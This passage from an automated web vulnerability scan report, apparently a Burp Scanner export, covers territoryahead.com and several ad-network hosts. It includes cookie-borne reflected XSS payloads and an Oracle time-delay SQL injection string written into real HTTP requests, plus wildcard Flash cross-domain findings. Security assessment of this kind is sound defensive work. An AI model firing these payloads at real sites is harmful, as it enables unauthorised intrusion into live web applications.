GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Yc8e35--><script>alert(1)</script>691c4488899; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:06 GMT
Server: Apache
ETag: "AAAAS7ucvNU"
Last-Modified: Fri, 25 Mar 2011 19:17:14 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
n;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; cmTPSet=Yc8e35--><script>alert(1)</script>691c4488899; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_message%28%28chr%2895%29%257c%257cchr%2833%29%257c%257cchr%2864%29%257c%257cchr%2851%29%257c%257cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108
...[SNIP]...

5.145. https://www.territoryahead.com/jump.jsp [customer cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the customer cookie is copied into an HTML comment. The payload 451ec--><script>alert(1)</script>e1e6716de1c was submitted in the customer cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931451ec--><script>alert(1)</script>e1e6716de1c; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:17 GMT
Server: Apache
ETag: "AAAAS7ucGB4"
Last-Modified: Fri, 25 Mar 2011 19:14:25 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
te,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931451ec--><script>alert(1)</script>e1e6716de1c; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_m
...[SNIP]...

5.146. https://www.territoryahead.com/jump.jsp [mmlID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the mmlID cookie is copied into an HTML comment. The payload c290d--><script>alert(1)</script>9551fb33735 was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168c290d--><script>alert(1)</script>9551fb33735; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache
ETag: "AAAAS7ub8EQ"
Last-Modified: Fri, 25 Mar 2011 19:13:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 37868


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168c290d--><script>alert(1)</script>9551fb33735; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; 90232094_clo
...[SNIP]...

5.147. https://www.territoryahead.com/jump.jsp [order cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the order cookie is copied into an HTML comment. The payload 2d0a4--><script>alert(1)</script>bcb7d662e45 was submitted in the order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=635039142d0a4--><script>alert(1)</script>bcb7d662e45; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:02 GMT
Server: Apache
ETag: "AAAAS7ucCQU"
Last-Modified: Fri, 25 Mar 2011 19:14:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ncoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=635039142d0a4--><script>alert(1)</script>bcb7d662e45; customer=92643931; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+
...[SNIP]...

5.148. https://www.territoryahead.com/jump.jsp [s_cc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the s_cc cookie is copied into an HTML comment. The payload 15573--><script>alert(1)</script>baa59d3f676 was submitted in the s_cc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true15573--><script>alert(1)</script>baa59d3f676; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:29:22 GMT
Server: Apache
ETag: "AAAAS7uc0rL"
Last-Modified: Fri, 25 Mar 2011 19:17:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
chr%2851%29%257c%257cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true15573--><script>alert(1)</script>baa59d3f676; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: nGhmwawSrSgAAET9iDcAAAA6
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.terr
...[SNIP]...

5.149. https://www.territoryahead.com/jump.jsp [s_sq cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the s_sq cookie is copied into an HTML comment. The payload a3d4d--><script>alert(1)</script>26f91f30e7b was submitted in the s_sq cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5Da3d4d--><script>alert(1)</script>26f91f30e7b; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:34 GMT
Server: Apache
ETag: "AAAAS7uc2DA"
Last-Modified: Fri, 25 Mar 2011 19:17:42 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
cchr%28100%29%257c%257cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true; s_sq=%5B%5BB%5D%5Da3d4d--><script>alert(1)</script>26f91f30e7b; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: fPNiUqwSrRQAAG3Tu24AAAAE
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.
...[SNIP]...

6. Flash cross-domain policy
There are 32 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Fri, 25 Mar 2011 19:13:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.2. http://aka-cdn-ns.adtechus.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://aka-cdn-ns.adtechus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aka-cdn-ns.adtechus.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 May 2010 09:39:46 GMT
Accept-Ranges: bytes
Content-Length: 111
Content-Type: text/xml
Cache-Control: max-age=141515
Expires: Mon, 28 Mar 2011 11:54:31 GMT
Date: Sat, 26 Mar 2011 20:35:56 GMT
Connection: close

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.3. http://api.search.live.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.search.live.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.search.live.net

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 266
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 68D294F3971D1719A2D5F7CCEEAC18F80000010A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 20:36:07 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-03-26T20%3a36%3a07; expires=Tue, 05-Apr-2011 20:36:07 GMT; domain=.live.net; path=/
Set-Cookie: _SS=SID=2DB9D01009D44A2088F8BF513528D138; domain=.live.net; path=/
Set-Cookie: SRCHUID=V=2&GUID=F87E1B9F1DEB4B42A164763906F31065; expires=Mon, 25-Mar-2013 20:36:07 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110326; expires=Mon, 25-Mar-2013 20:36:07 GMT; domain=.live.net; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.4. http://at.atwola.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.5. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Sat, 26 Mar 2011 19:13:28 GMT
Date: Fri, 25 Mar 2011 19:13:28 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.6. http://dominionenterprises.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dominionenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:29 GMT
Server: Omniture DC/2.0.0
xserver: www93
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.7. http://imagec17.247realmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imagec17.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagec17.247realmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 30 Oct 2009 20:24:23 GMT
ETag: "100e7-d0-4772cd0408bc0"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: text/xml
Date: Fri, 25 Mar 2011 19:13:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.8. http://learn.shavlik.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 20:41:54 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.9. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Content-Length: 378

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.10. http://o.sa.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:54 GMT
Server: Omniture DC/2.0.0
xserver: www18
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.11. http://oasc05139.247realmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oasc05139.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:04:47 GMT
ETag: "11e009-d0-46e5f7bee35c0"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.12. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 27 Mar 2011 20:36:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.13. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 25 Mar 2011 11:46:38 GMT
Expires: Thu, 24 Mar 2011 11:46:37 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 26799
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
